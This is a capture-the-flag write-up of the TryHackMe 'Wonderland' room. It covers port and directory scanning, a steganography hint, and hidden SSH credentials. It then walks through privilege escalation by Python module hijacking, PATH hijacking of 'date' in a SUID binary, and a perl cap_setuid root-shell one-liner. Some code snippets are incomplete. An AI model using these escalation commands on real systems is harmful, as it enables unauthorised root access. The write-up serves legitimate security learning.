Skip to content


These notes are from a challenge I did @tryhackme called wonderland.

First Checks

Let's scan for open ports first: nmap -sC -sV

Nmap output

Nmap scan report for
Host is up (0.075s latency).
Not shown: 998 closed ports
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 8e:ee:fb:96:ce:ad:70:dd:05:a9:3b:0d:b0:71:b8:63 (RSA)
|   256 7a:92:79:44:16:4f:20:43:50:a9:a8:47:e2:c2:be:84 (ECDSA)
|_  256 00:0b:80:44:e6:3d:4b:69:47:92:2c:55:14:7e:2a:c9 (ED25519)
80/tcp open  http    Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Follow the white rabbit.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 19.20 seconds

Let's search for paths on the webpage on port 80: gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u

Gobuster output

Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url:           
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
2021/10/21 16:46:38 Starting gobuster in directory enumeration mode
/img                  (Status: 301) [Size: 0] [--> img/]
/r                    (Status: 301) [Size: 0] [--> r/]
/poem                 (Status: 301) [Size: 0] [--> poem/]


Looking at we see the following files:

  • alice_door.jpg
  • alice_door.png
  • white_rabbit_1.jpg

Let's download them all:


and run steghide...

Unfortunately alice_door.jpg and alice_door.png don't show any result (at least not without a passphrase...) but white_rabbit_1.jpg seems promissing:

steghide extract -sf white_rabbit_1.jpg -p ''

the file "hint.txt" does already exist. overwrite ? (y/n) y
wrote extracted data to "hint.txt".
cat hint.txt
follow the r a b b i t

The hint means to follow this path:

Viewing the HTML code we see:

<p style="display: none;">alice:HowDothTheLittleCrocodileImproveHisShiningTail</p>

Login as alice

Let's try to login using those credentials: ssh alice@

SSH login output

Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-101-generic x86_64)

* Documentation:
* Management:
* Support:

System information as of Thu Oct 21 19:14:20 UTC 2021

System load:  0.0                Processes:           85
Usage of /:   18.9% of 19.56GB   Users logged in:     0
Memory usage: 31%                IP address for eth0:
Swap usage:   0%

0 packages can be updated.
0 updates are security updates.

Last login: Mon May 25 16:37:21 2020 from

It is strange to see root.txt in the folder of alice.find ./ -type f -iname "user.txt" doesn't reveal anything. The hint "Everything is upside down here." means if root.txt is here, maybe user.txt is under /root. We can directly read user.txt by runningcat /root/user.txt. lol...

Escalate privileges to rabbit

We see imports and calls random to get 10 random lines from the alice in wonderland lyrics stored in the file:

import random
for i in range(10):
    line = random.choice(poem.split("\n"))
    print("The line was:\t", line)a

Running sudo -l shows we can run as rabbit:

SSH login output

Matching Defaults entries for alice on wonderland:
    env_reset, mail_badpass,

User alice may run the following commands on wonderland:
    (rabbit) /usr/bin/python3.6 /home/alice/

To escalate privileges we can misuse the fact that we can run by creating our own with the following content to overwrite the random function imported and called in

import os

def choice(argument):

Running with our will now give us prompt as rabbit:

sudo -u rabbit /usr/bin/python3.6 /home/alice/

Tea Party

As rabbit we see the following files in home:

drwxr-x--- 2 rabbit rabbit  4096 May 25  2020 .
drwxr-xr-x 6 root   root    4096 May 25  2020 ..
lrwxrwxrwx 1 root   root       9 May 25  2020 .bash_history -> /dev/null
-rw-r--r-- 1 rabbit rabbit   220 May 25  2020 .bash_logout
-rw-r--r-- 1 rabbit rabbit  3771 May 25  2020 .bashrc
-rw-r--r-- 1 rabbit rabbit   807 May 25  2020 .profile
-rwsr-sr-x 1 root   root   16816 May 25  2020 teaParty

Running teaParty we get the following:

rabbit@wonderland:/home/rabbit$ ./teaParty
Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by Thu, 21 Oct 2021 20:39:50 +0000
Ask very nicely, and I will give you some tea while you wait for him

Let's copy teaParty to the kali machine and view it in detail with strings teaParty:

Serving teaParty to my kali machine

python3 -m http.server
Serving HTTP on port 8000 ( ... - - [21/Oct/2021 19:59:25] "GET /teaParty HTTP/1.1" 200 -

Downloading teaParty file

--2021-10-21 15:59:24--
Connecting to connected.
HTTP request sent, awaiting response... 200 OK
Length: 16816 (16K) [application/octet-stream]
Saving to: ‘teaParty’

teaParty                   100%[========================================>]  16.42K  --.-KB/s    in 0.02s

2021-10-21 15:59:24 (895 KB/s) - ‘teaParty’ saved [16816/16816]

Runstrings teaParty

Welcome to the tea party!
The Mad Hatter will be here soon.
/bin/echo -n 'Probably by ' && date --date='next hour' -R
Ask very nicely, and I will give you some tea while you wait for him
Segmentation fault (core dumped)
GCC: (Debian 8.3.0-6) 8.3.0

We see the program calls date in this line: /bin/echo -n 'Probably by ' && date --date='next hour' -R. Just like with "random" from above, let's create our own date file e.g.:


Now, let's change the file to be executable by everyone: chmod +x date and add it to the path variables: PATH=/home/rabbit:$PATH

If we now execute ./teaParty we get a shell as hatter:

Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by hatter@wonderland:/home/rabbit$

We can see the hatter password in /home/hatter/password.txt

Login as hatter

Since we have the user name and password, let' us login with ssh: ssh hatter@

sudo -l, find / -perm -u=s -type f 2>/dev/null and find / -xdev -user hatter 2>/dev/null don't reveal any interesting output but find / -xdev -group hatter 2>/dev/null shows group hatter owns perl. Unfortunately sudo is not possible and the suid bit isn’t set on the perl executable.

There is another thing we can check: With getcap -r / 2>/dev/null we can check for "capabilities" and we see perl in the list:

/usr/bin/perl5.26.1 = cap_setuid+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/perl = cap_setuid+ep

Let's run a perl script misusing the capabilities from GTOBins: "If the binary has the Linux CAP_SETUID capability set or it is executed by another binary with the capability set, it can be used as a backdoor to maintain privileged access by manipulating its own process UID."

/usr/bin/perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'

We are now root and can read the root.txt in the home folder of alice:

cat /home/alice/root.txt